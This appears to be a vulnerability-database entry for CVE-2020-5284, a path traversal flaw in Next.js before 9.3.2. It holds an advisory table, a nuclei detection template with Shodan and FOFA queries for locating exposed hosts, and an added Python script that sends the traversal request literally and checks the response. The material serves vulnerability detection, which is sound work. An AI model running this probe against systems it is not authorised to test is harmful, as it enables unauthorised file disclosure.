| Title | Published | Views | Family |
|---|---|---|---|
| CVE-2020-5284 | 30 Mar 2020 00:00 | – | attackerkb |
| ZEIT Next.js path traversal vulnerability | 31 Mar 2020 00:00 | – | cnvd |
| CVE-2020-5284 | 30 Mar 2020 20:40 | – | cve |
| CVE-2020-5284 Directory Traversal in Next.js versions below 9.3.2 | 30 Mar 2020 20:40 | – | cvelist |
| Directory Traversal in Next.js | 30 Mar 2020 20:40 | – | github |
| Path Traversal | 6 Apr 2020 18:29 | – | nodejs |
| CVE-2020-5284 | 30 Mar 2020 22:15 | – | nvd |
| GHSA-FQ77-7P7R-83RJ Directory Traversal in Next.js | 30 Mar 2020 20:40 | – | osv |
| Directory traversal | 30 Mar 2020 22:15 | – | prion |
| CVE-2020-5284 | 22 May 2025 15:38 | – | redhatcve |
```yaml
id: CVE-2020-5284

info:
  name: Next.js <9.3.2 - Local File Inclusion
  author: rootxharsh,iamnoooob,dwisiswant0
  severity: medium
  description: |
    Next.js versions before 9.3.2 are vulnerable to local file inclusion. An attacker can craft
    special requests to access files in the dist directory (.next). This does not affect files
    outside of the dist directory (.next). In general, the dist directory only holds build assets
    unless your application intentionally stores other assets under this directory.
  impact: |
    An attacker can exploit this vulnerability to read sensitive files on the server, potentially
    leading to unauthorized access or information disclosure.
  remediation: This issue is fixed in version 9.3.2.
  reference:
    - https://github.com/zeit/next.js/releases/tag/v9.3.2
    - https://github.com/zeit/next.js/security/advisories/GHSA-fq77-7p7r-83rj
    - https://nvd.nist.gov/vuln/detail/CVE-2020-5284
    - https://github.com/Z0fhack/Goby_POC
    - https://github.com/merlinepedra/nuclei-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 4.3
    cve-id: CVE-2020-5284
    cwe-id: CWE-22,CWE-23
    epss-score: 0.43426
    epss-percentile: 0.98577
    cpe: cpe:2.3:a:zeit:next.js:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: zeit
    product: next.js
    shodan-query:
      - http.html:"/_next/static"
      - cpe:"cpe:2.3:a:zeit:next.js"
    fofa-query: body="/_next/static"
  tags: cve,cve2020,nextjs,lfi,zeit,vuln,vkev

http:
  - method: GET
    path:
      - "{{BaseURL}}/_next/static/../server/pages-manifest.json"

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "application/json"

      - type: regex
        part: body
        regex:
          - '\{"/_app":".*?_app\.js"'

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100d68dc0429e724a0d87589985f4caecdfd606c6017fd4f98286fc62ea5f7fa38a022100cf33f43842d470f6b031472dea64f3c9529d0615f55210068313243fcfd00e38:922c64590222798bb761d5b6d8e72950
```
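The template's request only tests anything if the `/_next/static/../server/` segment reaches the server unchanged; curl without `--path-as-is`, browsers and several HTTP client libraries collapse `..` before sending, which quietly turns the probe into `/_next/server/pages-manifest.json`. The script below is an added example (not code from the Vulners page or the nuclei project): it writes the request over a raw socket so the path is sent literally, then applies the template's three matchers with AND semantics. The two sample responses at the bottom are constructed for offline testing, not captured from any host, and the target URL passed to `probe()` is an assumption.

```python
import re
import socket
import ssl
from urllib.parse import urlsplit

# Probe path from the template. It has to reach the server literally: curl
# (without --path-as-is), browsers and several HTTP libraries collapse "/.."
# client-side, which would turn this into /_next/server/pages-manifest.json.
PROBE_PATH = "/_next/static/../server/pages-manifest.json"

# Body matcher from the template: the manifest maps page routes to build files.
MANIFEST_RE = re.compile(r'\{"/_app":".*?_app\.js"')


def build_request(host: str, path: str = PROBE_PATH) -> bytes:
    """Assemble a raw GET. HTTP/1.0 is used so the server does not answer with
    chunked transfer-encoding, which the minimal parser below does not decode."""
    return (
        f"GET {path} HTTP/1.0\r\n"
        f"Host: {host}\r\n"
        "User-Agent: cve-2020-5284-check\r\n"
        "Connection: close\r\n"
        "\r\n"
    ).encode("ascii")


def parse_response(raw: bytes):
    """Split a raw HTTP response into (status code, lower-cased header dict, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    status = int(lines[0].split(None, 2)[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers, body.decode("utf-8", "replace")


def is_vulnerable(raw_response: bytes) -> bool:
    """The template's three matchers combined as matchers-condition: and."""
    status, headers, body = parse_response(raw_response)
    return (
        status == 200
        and "application/json" in headers.get("content-type", "")
        and MANIFEST_RE.search(body) is not None
    )


def probe(base_url: str, timeout: float = 10.0) -> bool:
    """Send the probe to base_url (e.g. https://app.example, an assumed target)."""
    u = urlsplit(base_url)
    host = u.hostname
    port = u.port or (443 if u.scheme == "https" else 80)
    sock = socket.create_connection((host, port), timeout=timeout)
    if u.scheme == "https":
        sock = ssl.create_default_context().wrap_socket(sock, server_hostname=host)
    with sock:
        sock.sendall(build_request(u.netloc))
        chunks = []
        while chunk := sock.recv(65536):
            chunks.append(chunk)
    return is_vulnerable(b"".join(chunks))


# Constructed sample responses for offline testing; not captured from any real host.
VULNERABLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: application/json; charset=utf-8\r\n"
    b"Connection: close\r\n"
    b"\r\n"
    b'{"/_app":"static/BUILD_ID/pages/_app.js","/_error":"static/BUILD_ID/pages/_error.js"}'
)
PATCHED_RESPONSE = (
    b"HTTP/1.1 404 Not Found\r\n"
    b"Content-Type: text/html; charset=utf-8\r\n"
    b"Connection: close\r\n"
    b"\r\n"
    b"<html><body>This page could not be found.</body></html>"
)

if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        print("vulnerable" if probe(sys.argv[1]) else "not vulnerable")
    else:
        print(is_vulnerable(VULNERABLE_RESPONSE), is_vulnerable(PATCHED_RESPONSE))
```

A match only says the manifest was served through the traversal; as the template's description notes, exposure is limited to the `.next` build directory, so confirm what the deployment actually stores there before rating the finding.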